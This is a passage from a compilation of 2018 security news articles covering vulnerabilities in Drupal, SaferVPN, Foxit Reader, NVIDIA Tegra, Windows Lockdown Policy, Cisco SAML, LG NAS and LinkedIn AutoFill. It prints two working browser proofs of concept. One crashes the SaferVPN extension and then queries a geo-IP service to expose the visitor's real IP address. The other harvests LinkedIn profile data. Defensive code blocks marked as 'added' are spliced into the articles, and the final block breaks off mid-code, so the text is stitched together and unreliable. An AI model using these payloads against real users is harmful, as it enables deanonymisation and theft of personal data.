“It doesn’t matter that you can set permissions and credentials on the My Cloud EX2 to make sure that your children’s photos are locked down and only available to somebody that’s actually authenticated with the device. By knowing how the traffic works with the My Cloud (EX2) appliance, you can actually get it to feed you any file on the device, regardless of the permissions. That is something new specific to this device.” continues Trustwave.

In February, researchers at Trustwave disclosed two other vulnerabilities in Western Digital My Cloud network storage devices that could be exploited by a local attacker to gain root access to the NAS devices.


Drupal Patches New Flaw Related to Drupalgeddon2

26.4.2018 securityweek Vulnerebility

Drupal developers have released updates for versions 7 and 8 of the content management system (CMS) to address a new vulnerability related to the recently patched flaw known as Drupalgeddon2.

The new vulnerability, tracked as CVE-2018-7602, has been described as a highly critical issue that can be exploited for remote code execution. The flaw has been patched with the release of versions 7.59, 8.4.8 and 8.5.3.

Drupal website administrators who cannot immediately install the updates can apply a patch, but the patch only works if the fix for the original Drupalgeddon2 vulnerability (CVE-2018-7600) is present. If the previous patch was not installed, the website may already be compromised, Drupal developers warned.

CVE-2018-7602 was discovered by members of the Drupal Security Team, which consists of 34 volunteers from around the world, along with Finland-based Drupal developer Jasper Mattsson, who also reported the original vulnerability. The new flaw was identified during an investigation into CVE-2018-7600.

New variant found for Drupalgeddon2 Drupal vulnerability

Drupal developers warn that similar to CVE-2018-7600, CVE-2018-7602 has also been exploited in the wild.

Drupalgeddon2 was patched in late March and the first attacks were seen roughly two weeks later, shortly after technical details and a proof-of-concept (PoC) exploit were made public.

While many of the exploitation attempts are designed to identify vulnerable systems, some cybercriminals have leveraged the flaw to deliver cryptocurrency miners, backdoors and other types of malware.

Some experts believe the security hole may have been exploited to deliver ransomware to the website of the Ukrainian energy ministry.

There are several groups exploiting Drupalgeddon2, including one that leverages a relatively large botnet named Muhstik, which is related to the old Tsunami botnet.

The botnet has helped cybercriminals make a profit by delivering cryptocurrency miners such as XMRig and CGMiner, and by launching distributed denial-of-service (DDoS) attacks.

Two security firms have independently confirmed that one of the Drupalgeddon2 campaigns delivering a Monero cryptocurrency miner is linked to a cybercriminal group that last year exploited a vulnerability in Oracle WebLogic Server (CVE-2017-10271) to infect systems with cryptocurrency malware.

Drupal powers more than one million websites, including nine percent of the top 10,000 most popular websites running a known CMS, making it a tempting target for malicious actors.


Another Critical Flaw Found In Drupal Core—Patch Your Sites Immediately
25.4.2018 thehackernews 
Vulnerebility

It's time to update your Drupal websites, once again.
For the second time within a month, Drupal has been found vulnerable to another critical vulnerability that could allow remote attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft.
Discovered by the Drupal security team, the open source content management framework is affected by a cross-site scripting (XSS) vulnerability that resides in a third-party plugin, CKEditor, which comes pre-integrated in Drupal core to help site administrators and users create interactive content.
CKEditor is a popular JavaScript-based WYSIWYG rich text editor that is used by many websites and comes pre-installed with some popular web projects.
According to a security advisory released by CKEditor, the XSS vulnerability stems from the improper validation of "img" tag in Enhanced Image plugin for CKEditor 4.5.11 and later versions.

This could allow an attacker to execute arbitrary HTML and JavaScript code in the victim's browser and gain access to sensitive information.
Enhanced Image plugin was introduced in CKEditor 4.3 and supports an advanced way of inserting images into the content using an editor.
"The vulnerability stemmed from the fact that it was possible to execute XSS inside CKEditor when using the image2 plugin (which Drupal 8 core also uses)," the Drupal security team said.
CKEditor has patched the vulnerability with the release of CKEditor version 4.9.2, which has also been patched in the CMS by the Drupal security team with the release of Drupal version 8.5.2 and Drupal 8.4.7.
Since CKEditor plugin in Drupal 7.x is configured to load from the CDN servers, it is not affected by the flaw.
However, if you have installed the CKEditor plugin manually, you are advised to download and upgrade your plugin to the latest version from its official website.
Drupal recently patched another critical vulnerability, dubbed Drupalgeddon2, a remote code execution bug that allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations under the privileges of the user, affecting all versions of Drupal from 6 to 8.
However, because people are slow to patch their systems and websites, the Drupalgeddon2 vulnerability has been exploited in the wild by hackers to deliver cryptocurrency miners, backdoors, and other malware.
Therefore, users are highly recommended to always take security advisories seriously and keep their systems and software up-to-date in order to avoid becoming victims of a cyber attack.


SAFERVPN CVE-2018-10308 VULNERABILITY, FROM DOS TO DEANONYMIZATION
25.4.2018 securityaffairs
Vulnerebility

Researcher Paulos Yibelo explored a vulnerability he found in the SaferVPN Chrome Extension. The vulnerability, tracked as CVE-2018-10308, should help malicious actors retrieve vital information such as IP addresses when a user visits a website.
After my last month’s finding in Hotspot Shield, I decided to look at and audit more VPNs to see how many of the major VPN vendors are vulnerable to information leakage. Together with File Descriptor, we decided to look at 3 random major VPN clients to see what we can find. Our research was supported by the privacy advocate vpnmentor.

We initially selected PureVPN, Hotspot Shield, and Zenmate as pilot targets and went ahead with the research. What we’ve found surprised us: of all 3 VPNs we’ve tested, we’ve discovered all of them leak sensitive data.

The vulnerabilities would have allowed governments, hostile organizations, or individuals to identify the actual IP address or DNS of a user, and in some cases hijack the user’s traffic. While Zenmate’s leak was somewhat minor compared to the two other VPNs, it’s still important. You can find the details of the vulnerabilities found here, here or here.

The fact that we found leaks in all the VPNs that we tested is worrying, and led us to believe VPNs may not be as safe as many may think. This opened doors for further research. Our guess is that most VPNs have similar leaks and that users should take this into consideration when using VPNs.

VPN SAFERVPN

Details

In this blog post, I will explore a vulnerability I found in the SaferVPN Chrome Extension. The vulnerability, CVE-2018-10308, as simple as it is, should help malicious actors retrieve vital information such as IP addresses when a user visits a website.

When a series of simultaneous requests to a nonexistent server is sent, the VPN extension easily crashes, letting us leak real user IPs, DNS and other details which the VPN is supposed to hide.

This is a weird bug, as I didn’t know Chrome extensions could be DoSed until now. I’ve tried putting breakpoints through the extension’s debugger to see what is causing it, and they seem to intentionally kill the extension when it resolves many non-existent DNS queries.

Here is a PoC that works on versions before 3.1.10

<script type="text/javascript">
var head = document.getElementsByTagName('head')[0];
var img = document.createElement('img');
// an unresolvable host: every load attempt produces a failing DNS query
img.src = "https://nonexistant.nonexistant.nonexistant";
function kill(){
for(var i=0;i<12;i++){
head.appendChild(img);
}
}
kill();
// after the extension has crashed, ask a geo-IP service which IP it sees
window.onload = setTimeout(function () {
var webService = "https://freegeoip.net/json/";
var script = document.createElement("script");
script.type = "text/javascript";
script.src = webService+"?callback=MyIP&format=jsonp";
document.getElementsByTagName("head")[0].appendChild(script);
}, 9000);
function MyIP(response) {
document.getElementById("ipaddress").innerHTML = response.ip;
}
</script>
<div id="ipaddress"></div>

Timeline

Thu, Mar 29 – contacted SaferVPN
Thu, Apr 19 – SaferVPN patch live.


Code Execution Flaws Patched in Foxit PDF Reader
24.4.18 securityweek
Vulnerebility

Foxit has addressed over a dozen vulnerabilities in its PDF Reader, a free application that provides users with an alternative to Adobe Acrobat Reader.

Designed for viewing, creating, and editing PDF documents, Foxit PDF Reader is a popular free program that also has a broadly used browser plugin available.

Released on Friday, the latest version of the application addresses an Unsafe DLL Loading security bug reported by Ye Yint Min Thu Htut. The issue is created because the app “passes an insufficiently qualified path in loading an external library when a user launches the application,” the researcher explains.

The issue occurs when the application fails to resolve the DLL because the file doesn’t exist at the specified path. By placing a malicious DLL in the specified path directory, an attacker could exploit the vulnerability and execute remote code.

The new Foxit PDF Reader update also resolves five security vulnerabilities discovered by Cisco Talos security researchers, which could be exploited for code execution.

The first of them, CVE-2017-14458, is a use-after-free in the application’s JavaScript engine. When a document is closed, embedded JavaScript code continues to execute even though the objects it uses have been freed. An attacker can thus use a specially crafted PDF document to trigger access to a previously freed object and achieve arbitrary code execution.

“There are a couple of different ways an adversary could leverage this attack, including tricking a user into opening a malicious PDF. Or, if the browser plugin is enabled, simply viewing the document on the internet could result in exploitation,” Talos explains.

The second bug, CVE-2018-3842, is a use of an uninitialized pointer flaw in the application’s JavaScript, and could be abused to achieve remote code execution.

Cisco Talos found two other flaws in the JavaScript engine of Foxit PDF Reader, both use-after-free bugs: CVE-2018-3850 and CVE-2018-3853. The former resides in the 'this.xfa.clone()' method, which results in a use-after-free condition, while the latter resides in combinations of the 'createTemplate' and 'closeDoc' methods related to the program’s JavaScript functionality.

The fifth vulnerability (CVE-2018-3843) results from a type confusion in the way the PDF reader parses files with associated extensions. A specially crafted PDF file could be used to exploit the flaw and disclose sensitive memory or, potentially, achieve arbitrary code execution.

Other vulnerabilities addressed in Foxit PDF Reader could also result in remote code execution, in information disclosure, or in application crashes, Foxit reveals in the update’s release notes.

Affected application versions include Foxit Reader and Foxit PhantomPDF 9.0.1.1049 and earlier. The vulnerabilities were addressed in Foxit Reader and Foxit PhantomPDF 9.1.


Vulnerability in NVIDIA Tegra Chipsets Allows for Code Execution
24.4.18 securityweek
Vulnerebility

A vulnerability in NVIDIA's Tegra chipsets allows for the execution of custom code on locked-down devices, security researcher Kate Temkin reveals.

Dubbed Fusée Gelée, this exploit leverages a coldboot vulnerability through which an attacker could achieve full, unauthenticated arbitrary code execution from an early bootROM context via Tegra Recovery Mode (RCM), the security researcher says.

The code is executed on the Boot and Power Management Processor (BPMP) before any lock-outs take effect, which results in the compromise of the entire root-of-trust for each processor, while also allowing for the exfiltration of secrets.

In a technical report (PDF) detailing the flaw, Temkin notes that the issue is that an attacker can control the length of a copy operation in the USB software stack inside the boot instruction rom (IROM/bootROM). Thus, through a specially crafted USB control request, the contents of an attacker-controlled buffer can be copied over the active execution stack, gaining control of BPMP.

The attacker can then abuse the execution to exfiltrate secrets and load arbitrary code onto the main CPU Complex (CCPLEX) application processors. The code would be executed at the highest possible level of privilege (as the TrustZone Secure Monitor at PL3/EL3).
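The defect class described above is a copy whose length comes from a host-controlled field in a USB control request. The following is an added example, not code from Temkin's report or from NVIDIA: it parses the standard 8-byte USB SETUP packet and refuses any OUT transfer whose claimed wLength exceeds the receiving buffer before a single byte is copied. The function names, the buffer size and the ok/stall result shape are assumptions for illustration.

```javascript
// Added example (not from Temkin's report or NVIDIA): parsing a USB SETUP
// packet and bounding the data-stage copy by the capacity of the receiving
// buffer. Function names, CONTROL_BUFFER_SIZE and the result shape are
// assumptions for illustration, not the bootROM's actual code.

const SETUP_PACKET_LEN = 8;
const CONTROL_BUFFER_SIZE = 0x200; // assumed capacity of the device-side buffer

// Standard USB SETUP packet (little-endian): bmRequestType, bRequest,
// wValue, wIndex, wLength. wLength is the host's claim about how many bytes
// follow in the data stage, so it is untrusted input to the device.
function parseSetupPacket(buf) {
  if (!Buffer.isBuffer(buf) || buf.length !== SETUP_PACKET_LEN) {
    throw new RangeError('SETUP packet must be exactly 8 bytes');
  }
  return {
    bmRequestType: buf.readUInt8(0),
    bRequest: buf.readUInt8(1),
    wValue: buf.readUInt16LE(2),
    wIndex: buf.readUInt16LE(4),
    wLength: buf.readUInt16LE(6),
  };
}

// Builds a SETUP packet; used to construct the sample requests below.
function makeSetup(bmRequestType, bRequest, wValue, wIndex, wLength) {
  const b = Buffer.alloc(SETUP_PACKET_LEN);
  b.writeUInt8(bmRequestType, 0);
  b.writeUInt8(bRequest, 1);
  b.writeUInt16LE(wValue, 2);
  b.writeUInt16LE(wIndex, 4);
  b.writeUInt16LE(wLength, 6);
  return b;
}

// Device-side handler for a control request with an OUT data stage. The copy
// into `dest` is bounded by dest.length before any byte is moved; a request
// that claims more than the buffer can hold is refused (a STALL on real
// hardware) instead of being copied with the host-supplied length.
function handleControlRequest(setupBytes, dataStage, dest = Buffer.alloc(CONTROL_BUFFER_SIZE)) {
  const setup = parseSetupPacket(setupBytes);
  const hostToDevice = (setup.bmRequestType & 0x80) === 0; // bit 7 = direction
  if (!hostToDevice) {
    return { status: 'ok', copied: 0, setup }; // IN request: nothing to receive
  }
  if (setup.wLength > dest.length) {
    return {
      status: 'stall',
      copied: 0,
      reason: `wLength ${setup.wLength} exceeds buffer of ${dest.length} bytes`,
      setup,
    };
  }
  if (dataStage.length < setup.wLength) {
    return { status: 'stall', copied: 0, reason: 'data stage shorter than wLength', setup };
  }
  const copied = dataStage.copy(dest, 0, 0, setup.wLength);
  return { status: 'ok', copied, setup };
}
```

The check has to sit on the length field itself: clamping at copy time would still let a host drive the copy up to the buffer edge, so the request is rejected outright when the declared length cannot fit.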

Impacting the Tegra chipset, the vulnerability is independent of the software stack. However, the security bug does require physical access to the affected hardware and cannot be exploited remotely.

Fusée Gelée, the researcher explains, is the result of a coding error in the read-only bootROM found in most Tegra devices. Because the affected component cannot be patched once it has left the factory, the vulnerability will continue to impact user devices.

The vulnerability has a broad impact and the security researcher has already responsibly disclosed it to NVIDIA, and Nintendo has been alerted as well. Temkin says she hasn’t accepted a reward for the finding.

“This vulnerability is notable due to the significant number and variety of devices affected, the severity of the issue, and the immutability of the relevant code on devices already delivered to end users. This vulnerability report is provided as a courtesy to help aid remediation efforts, guide communication, and minimize impact to users,” the security researcher notes.

Nintendo Switch is one of the affected devices, and Temkin, who works with hacking project ReSwitched, is building customized Switch firmware called Atmosphère, which takes advantage of Fusée Gelée.

The vulnerability is believed to impact all Tegra SoCs released prior to the T186 / X2. Full public disclosure is planned for June 15, 2018, but other groups are believed to be in possession of an exploit, and the disclosure might happen earlier if an implementation is released.

“By minimizing the information asymmetry between the general public and exploit-holders and notifying the public, users will be able to best assess how this vulnerability impacts their personal threat models,” the researcher says.

All Nintendo Switch devices currently in users’ hands will continue to “be able to use Fusée Gelée” throughout their lives, the researcher says. Users who already own a Switch (meaning they have a current hardware revision) will get access to Atmosphère even if they install a newer firmware version, because the core vulnerability is not software dependent.

“Fusée Gelée isn't a perfect, 'holy grail' exploit-- though in some cases it can be pretty damned close. The different variants of Fusée Gelée will each come with their own advantages and disadvantages. We'll work to make sure you have enough information to decide which version is right for you around when we release Fusée Gelée to the public, so you can decide how to move forward,” Temkin said.


Drupal to Release Second Drupalgeddon2 Patch as Attacks Continue
24.4.18 securityweek
Vulnerebility

Drupal developers announced on Monday that versions 7.x, 8.4.x and 8.5.x of the content management system (CMS) will receive a new security update later this week.

The Drupal core updates, scheduled for April 25 between 16:00 and 18:00 UTC, will deliver a follow-up patch for the highly critical vulnerability tracked as CVE-2018-7600 and dubbed “Drupalgeddon2.”

While Drupal developers have described the upcoming security releases as a follow-up to the updates that fixed Drupalgeddon2, a separate CVE identifier, namely CVE-2018-7602, has been assigned to the new vulnerability.

“For all security updates, the Drupal Security Team urges you to reserve time for core updates at that time because there is some risk that exploits might be developed within hours or days,” Drupal said. “The Security Team or any other party is not able to release any more information about this vulnerability until the announcement is made.”

The Drupalgeddon2 vulnerability was patched in late March and the first attacks were spotted roughly two weeks later, shortly after technical details and a proof-of-concept (PoC) exploit were made public.

While many of the exploitation attempts represent scans designed to identify vulnerable systems, cybersecurity firms have spotted several campaigns that leverage the flaw to deliver cryptocurrency miners, backdoors and other types of malware.

According to 360Netlab, at least three threat groups have been exploiting the recently patched vulnerability. The company says some of the Drupalgeddon2 attacks are powered by a relatively large botnet tracked by the company as Muhstik. Experts believe Muhstik is actually a variant of the old Tsunami botnet.

“We noticed one of them has worm-propagation behavior,” 360Netlab wrote in a blog post. “After investigation, we believe this botnet has been active for quite a time. We name it muhstik, for this key word keeps popping up in its binary file name and the communication IRC channel.”

Muhstik uses two main propagation methods: the aioscan scanning module, which includes seven scanning-related payloads on four different ports, and an SSH scanning module that looks for systems with weak passwords.

Researchers say the botnet can help malicious actors make a profit by delivering cryptocurrency miners such as XMRig and CGMiner, and by using Muhstik to launch distributed denial-of-service (DDoS) attacks.

Volexity reported last week that one of the Monero miner campaigns appeared to be linked to a cybercrime group that last year exploited a vulnerability in Oracle WebLogic Server (CVE-2017-10271) to infect systems with cryptocurrency malware. GreyNoise Intelligence has confirmed the connection between these attacks.


Google Discloses Windows Lockdown Policy Zero-Day
23.4.2018 securityweek
Vulnerebility

Google Discloses Unpatched Windows Lockdown Policy Bypass

A Windows 10 vulnerability that could bypass Windows Lockdown Policy and result in arbitrary code execution remains unpatched 90 days after Microsoft was informed of the bug’s existence.

On systems with User Mode Code Integrity (UMCI) enabled, a .NET bug can be exploited to bypass the Windows Lockdown Policy check for COM Class instantiation, security researcher James Forshaw of Google's Project Zero team explains.

The issue was reproduced on Windows 10S, but is said to impact all Windows 10 versions with UMCI enabled.

The vulnerability, the security researcher explains, resides in the manner in which the WLDP COM Class lockdown policy behaves when a .NET COM object is instantiated.

The policy contains a hardcoded list of 8 to 50 COM objects which enlightened scripting engines can instantiate. Thus, even if one were able to register an existing DLL under one of the allowed COM CLSIDs, a correct implementation should check the CLSID passed to DllGetObject against that internal list and prevent the attack.

What the security researcher discovered was that, when a .NET COM object is instantiated, the CLSID passed to DllGetClassObject is only used to look up the registration information in HKCR, the CLSID is thrown away, and the .NET object created.

Because of that, an attacker can add registry keys, including to HKCU, to load an arbitrary COM visible class under one of the allowed CLSIDs.

“This has a direct impact on the class policy as it allows an attacker to add registry keys (including to HKCU) that would load an arbitrary COM visible class under one of the allowed CLSIDs. As .NET then doesn’t care about whether the .NET Type has that specific GUID you can use this to bootstrap arbitrary code execution,” the researcher notes.

For successful exploitation, an attacker could use tools such as Forshaw’s DotNetToJScript, a free tool that generates a JScript which bootstraps an arbitrary .NET Assembly and class.

Forshaw also published a Proof-of-Concept as two files: an .INF to set-up the registry and a .SCT. The latter is an example built using DotNetToJScript to load an untrusted .NET assembly into memory to display a message box, but it could be used for more than that.

The flaw was reported to Microsoft on January 19, when the company acknowledged the flaw. As per Project Zero’s policy, vendors are given 90 days to patch flaws before they are made public, and Microsoft didn’t meet the deadline for this issue.

The bug, however, isn’t critical, which is one of the main reasons its details were publicly released.

“This issue was not fixed in April patch Tuesday therefore it's going over deadline. This issue only affects systems with Device Guard enabled (such as Windows 10S) and only serves as a way of getting persistent code execution on such a machine. It's not an issue which can be exploited remotely, nor is it a privilege escalation,” the security researcher explains.

To abuse the flaw, an attacker would need a foothold on the impacted machine to install the needed registry entries. A remote code execution flaw in the operating system could be abused for that.

Considering that there are known Device Guard bypasses in the .NET framework that haven’t been fixed and continue to be usable, the security vulnerability is less serious than it would have been if all known avenues for bypass were fixed, Forshaw concludes.


Google Project Zero hacker discloses a Zero-Day in Windows Lockdown Policy
23.4.2018 securityaffairs 
Vulnerebility

Google researcher has publicly disclosed a Windows 10 zero-day that could be exploited by attackers to bypass Windows Lockdown Policy on systems with User Mode Code Integrity (UMCI).
Google has publicly disclosed a Windows 10 zero-day vulnerability that could be exploited by attackers to bypass Windows Lockdown Policy on systems with User Mode Code Integrity (UMCI) enabled and execute arbitrary code on the target system.

Project Zero hacker James Forshaw publicly disclosed the issue because the vulnerability was not fixed in a 90-day period according to the Google disclosure policy.

The zero-day affects all Windows 10 versions with UMCI enabled; Forshaw successfully exploited it on Windows 10S.

“The enlightened Windows Lockdown Policy check for COM Class instantiation can be bypassed by using a bug in .NET leading to arbitrary code execution on a system with UMCI enabled (e.g. Device Guard)” states the security advisory published by Google.

The zero-day flaw is tied to the way the WLDP COM Class lockdown policy behaves when a .NET COM object is instantiated.

The WLDP COM Class lockdown policy contains a hardcoded list of 8 to 50 COM objects which enlightened scripting engines can instantiate.

To prevent such an attack, a correct implementation of the policy should check the CLSID passed to DllGetObject against the hardcoded list, even when an existing DLL has been registered under one of the allowed CLSIDs.

“The WLDP COM Class lockdown policy contains a hardcoded list of 8 to 50 COM objects which enlightened scripting engines can instantiate. Excluding issues related to the looking up of the correct CLSID (such as previously reported abuse of TreatAs case 40189).” continues the analysis.

“This shouldn’t be a major issue even if you can write to the registry to register an existing DLL under one of the allowed COM CLSIDs as a well behaved COM implementation should compare the CLSID passed to DllGetObject against its internal list of known objects.”

The Google expert discovered that when a .NET COM object is instantiated, the CLSID passed to mscoree’s DllGetClassObject is only used to look up the registration information in HKCR; the CLSID is then thrown away and the .NET object created.

This means that an attacker can add registry keys, including to HKCU, that would load an arbitrary COM visible class under one of the trusted CLSIDs.

“This has a direct impact on the class policy as it allows an attacker to add registry keys (including to HKCU) that would load an arbitrary COM visible class under one of the allowed CLSIDs. As .NET then doesn’t care about whether the .NET Type has that specific GUID you can use this to bootstrap arbitrary code execution,” continues the analysis.


The Google researcher published a Proof of Concept code for the vulnerability that is composed of two files:

an .INF to set-up the registry.
a .SCT created with the DotNetToJScript free tool that could be used to load an untrusted .NET assembly into memory to display a message box.
The researcher reported the vulnerability to Microsoft on January 19, but the tech giant hasn’t addressed it in 90 days.

“This issue was not fixed in April patch Tuesday therefore it’s going over deadline. This issue only affects systems with Device Guard enabled (such as Windows 10S) and only serves as a way of getting persistent code execution on such a machine. It’s not an issue which can be exploited remotely, nor is it a privilege escalation,” added the expert.

The expert highlighted that attackers need to gain access to the system to exploit the flaw and install registry entries.


CVE-2018-0229 flaw in SAML implementation threatens Firepower, AnyConnect and ASA products
23.4.2018 securityaffairs 
Vulnerebility

Cisco has announced a set of security patches that address the CVE-2018-0229 vulnerability in its implementation of the Security Assertion Markup Language (SAML).
The CVE-2018-0229 flaw could be exploited by an unauthenticated, remote attacker to establish an authenticated AnyConnect session through an affected device running ASA or FTD Software.

“A vulnerability in the implementation of Security Assertion Markup Language (SAML) Single Sign-On (SSO) authentication for Cisco AnyConnect Secure Mobility Client for Desktop Platforms, Cisco Adaptive Security Appliance (ASA) Software, and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to establish an authenticated AnyConnect session through an affected device running ASA or FTD Software.” reads the security advisory published by CISCO.

“The authentication would need to be done by an unsuspecting third party.”

The CVE-2018-0229 flaw affects the following Cisco solutions:

Single sign-on authentication for the AnyConnect desktop mobility client;
Adaptive Security Appliance (ASA) software; and
Firepower Threat Defense (FTD) software.
According to Cisco, the flaw exists because the ASA or FTD software has no mechanism to detect whether the authentication request originates directly from the AnyConnect client.

An attacker could exploit the CVE-2018-0229 vulnerability by tricking victims into clicking a specifically crafted link and authenticating using the company’s Identity Provider (IdP). In this scenario, the attacker can hijack a valid authentication token and use that to establish and set up an AnyConnect session through an affected device running ASA or FTD Software.


The flaw affects the Cisco AnyConnect Secure Mobility Client, and ASA Software and FTD Software configured for SAML 2.0-based SSO for AnyConnect Remote Access VPN that is running on the following Cisco products:

3000 Series Industrial Security Appliances (ISA)
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4100 Series Security Appliance
Firepower 9300 ASA Security Module
FTD Virtual (FTDv)
Cisco confirmed that only ASA software running version 9.7.1 and later is vulnerable; the issue also affects FTD software running version 6.2.1 and later, and AnyConnect version 4.4.00243 and later.


Unpatched Flaw Exposes LG NAS Devices to Remote Attacks
21.4.2018 securityweek
Vulnerebility

Researchers claim hackers can remotely exploit an unpatched command injection vulnerability to take control of network-attached storage (NAS) devices from LG.

VPN specialists at vpnMentor discovered that many LG NAS models are impacted by a flaw that can be exploited without authentication.

According to researchers, the password parameter in the login page is vulnerable to command injection. An attacker can abuse this parameter to execute arbitrary commands, including for adding a new user account and dumping the database containing existing usernames and passwords.

Adding a new username and an associated password hash allows an attacker to log in to the administration interface as an authorized user and access any file stored on the device.

vpnMentor told SecurityWeek that attacks exploiting this flaw can be launched both from the local network and the Internet. The company says it’s difficult to determine exactly how many devices are vulnerable to attacks from the Internet, but it estimates that it’s roughly 50,000.

vpnMentor has randomly tested a majority of LG NAS device models and they appear to be vulnerable. The company says LG uses two types of firmware across all its NAS products and one of them is impacted by this vulnerability.

Proof-of-concept (PoC) code and a video have been made available to demonstrate the vulnerability.

LG has been notified about the security hole, but vpnMentor claims it has not received any response from the tech giant and there is no sign of a patch. SecurityWeek has reached out to LG for comment and will update this article if the company responds.

This is not the first time researchers have found serious vulnerabilities in LG NAS products. A couple of years ago, Hungary-based SEARCH-LAB analyzed LG’s N1A1 product and discovered multiple flaws that could have been leveraged to gain admin access to devices.


A flaw in LinkedIn feature allowed user data harvesting
20.4.2018 securityaffairs
Vulnerebility

The researcher Jack Cable (18) has discovered a vulnerability in LinkedIn, the AutoFill functionality, that allowed user data harvesting.
While experts and the public are discussing the Cambridge Analytica case, another disconcerting case made the headlines: the private intelligence agency LocalBlox left an AWS bucket unsecured online containing 48 million records that were also harvested from Facebook, LinkedIn, and Twitter.

No doubt, data harvesting is a common practice and we are only discovering the tip of the iceberg; many companies and intelligence agencies do it for different reasons.

Sometimes this activity is made easier by security flaws in the features implemented by the social media platforms.

In early April, Mark Zuckerberg admitted that the public data of Facebook’s 2.2 billion users had been compromised over the course of several years by third-party actors that gathered information on its users. Third-party scrapers exploited an issue in Facebook’s search function that allowed anyone to look up users via their email address or phone number.

Now the researcher Jack Cable (18) has discovered a flaw in LinkedIn, the AutoFill functionality, that allowed user data harvesting.

The AutoFill functionality allows users to quickly fill out forms with data from their LinkedIn profile, including name, title, company, email address, phone number, city, zip code, state, and country.

Cable explained that it is possible to abuse the function to harvest user data by placing the AutoFill button on a malicious website: rather than leaving the LinkedIn button visible on the page, the attacker could change its properties, position it anywhere in the page and make it invisible.

With this trick, which clearly violates LinkedIn’s privacy policies, when a user visited the malicious site and clicked anywhere on the page, they unknowingly clicked the invisible AutoFill button, resulting in their LinkedIn data being harvested.

“The potential for exploitation existed until being patched 04/19/18, as any whitelisted website can access this information with a single click.” wrote Cable.

“The exploit flowed as follows:

The user visits the malicious site, which loads the LinkedIn AutoFill button iframe.
The iframe is styled so it takes up the entire page and is invisible to the user.
The user clicks anywhere on the page. LinkedIn interprets this as the AutoFill button being pressed, and sends the information via postMessage to the malicious site.
The site harvests the user’s information via the following code:

window.addEventListener("message", receiveMessage, false);

function receiveMessage(event)
{
  // Only handle messages posted by the LinkedIn origin
  if (event.origin == 'https://www.linkedin.com') {
    let data = JSON.parse(event.data).data;
    if (data.email) {
      alert('Hi, ' + data.firstname + ' ' + data.lastname + '! Your email is ' + data.email + '. You work at ' + data.company + ' and you live in ' + data.city + ', ' + data.state + '.');
      console.log(data);
    }
  }
  console.log(event);
}



Cable pointed out that with this trick non-public data was also provided to a site abusing the AutoFill function, even though LinkedIn states in its documentation that only public data is provided to fill out forms.

Cable reported the flaw to LinkedIn on April 9 and the company temporarily restricted the AutoFill functionality to whitelisted sites. Of course, this did not completely address the problem: an attacker who was able to compromise a whitelisted site was still in a position to harvest data from LinkedIn.

On April 19, LinkedIn published a stable fix for the issue.

LinkedIn said there had been no evidence of malicious exploitation, but I’m sure that many of you have a different opinion.


LinkedIn Vulnerability Allowed User Data Harvesting
20.4.2018 securityweek
Vulnerebility

LinkedIn recently patched a vulnerability that could have been exploited by malicious websites to harvest data from users’ profiles, including private information.

The flaw affected the AutoFill functionality, which allows websites to offer users the possibility to quickly fill out forms with data from their LinkedIn profile. Users simply click the AutoFill button on a webpage containing a form and some of the fields are pre-populated with data available from LinkedIn, including name, title, company, email address, phone number, city, zip code, state and country.

Jack Cable, an 18-year-old researcher based in Chicago, noticed that this functionality could have been abused to harvest user data by placing the AutoFill button on a malicious site. Rather than leaving the button as provided by LinkedIn, an attacker could have changed its properties to spread it across the entire web page and make it invisible.

Whenever a user would visit the malicious site and click anywhere on the page, they would actually be clicking on the invisible AutoFill button, resulting in their LinkedIn data being harvested by the website.

Cable pointed out that the possibility to launch these types of attacks clearly violated LinkedIn’s policies related to the use of AutoFill. First of all, the social media giant does not allow form field data to be submitted without being seen by the user.

Secondly, while some of the exposed data was publicly accessible on users’ LinkedIn profiles, non-public data was also provided to a site abusing AutoFill. LinkedIn states in its documentation that only public data is used to fill out forms.

Cable reported the vulnerability to LinkedIn on April 9 and a temporary solution that involved restricting the AutoFill functionality to whitelisted sites was rolled out the next day. However, the researcher argued that this fix was incomplete as whitelisted websites still could have collected user data. Furthermore, there was also the possibility of a whitelisted site getting compromised and abused for data harvesting.

LinkedIn rolled out a more permanent fix on April 19. Bleeping Computer reports that users are now prompted whenever their data is being sent to a website via the AutoFill functionality. The social media company said there had been no evidence of malicious exploitation.
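Both write-ups above turn on two checks in a cross-origin postMessage integration: the embedded frame should release data only to an allowlisted embedding origin and address the message to that origin explicitly, and the embedding page should accept data only from the exact expected sender (the check in Cable's receiveMessage handler). The code below is an added example, not LinkedIn's or Cable's code; the allowlist, the origins, the sample profile and the deliver() stand-in for window.postMessage are constructed so it runs outside a browser.

```javascript
// Added example; not LinkedIn's or Cable's code. Shows the sender-side
// allowlist plus explicit targetOrigin, and the receiver-side exact origin
// match. ALLOWED_HOST_ORIGINS, SAMPLE_PROFILE and deliver() are constructed.

const ALLOWED_HOST_ORIGINS = new Set([
  'https://forms.example.com',
  'https://careers.example.org',
]);
const TRUSTED_SENDER = 'https://www.linkedin.com'; // origin the embedder expects
const SAMPLE_PROFILE = {
  firstname: 'Jane', lastname: 'Doe', email: 'jane@example.com', city: 'Chicago',
};

// Exact comparison of the full origin (scheme + host + port). Substring or
// endsWith tests would also accept https://www.linkedin.com.attacker.example.
function isAllowedOrigin(origin, allowlist) {
  return typeof origin === 'string' && allowlist.has(origin);
}

// Frame side: decide whether to send profile data to the page that embedded
// the button. targetOrigin is the embedder's own origin, never '*'.
function buildAutoFillReply(hostOrigin, profile, allowlist = ALLOWED_HOST_ORIGINS) {
  if (!isAllowedOrigin(hostOrigin, allowlist)) {
    return { send: false, targetOrigin: null, payload: null, reason: `${hostOrigin} is not allowlisted` };
  }
  return { send: true, targetOrigin: hostOrigin, payload: JSON.stringify({ data: profile }) };
}

// Embedder side: the same shape of check as the receiveMessage handler in
// Cable's write-up, with exact origin matching and tolerant JSON parsing.
function parseAutoFillMessage(event, trustedSender = TRUSTED_SENDER) {
  if (event.origin !== trustedSender) return null;
  try {
    const parsed = JSON.parse(event.data);
    return parsed && typeof parsed.data === 'object' && parsed.data !== null ? parsed.data : null;
  } catch (err) {
    return null;
  }
}

// Stand-in for window.postMessage so this runs outside a browser: the
// browser discards a message whose targetOrigin does not match the receiving
// window's origin, and stamps event.origin with the sender's origin.
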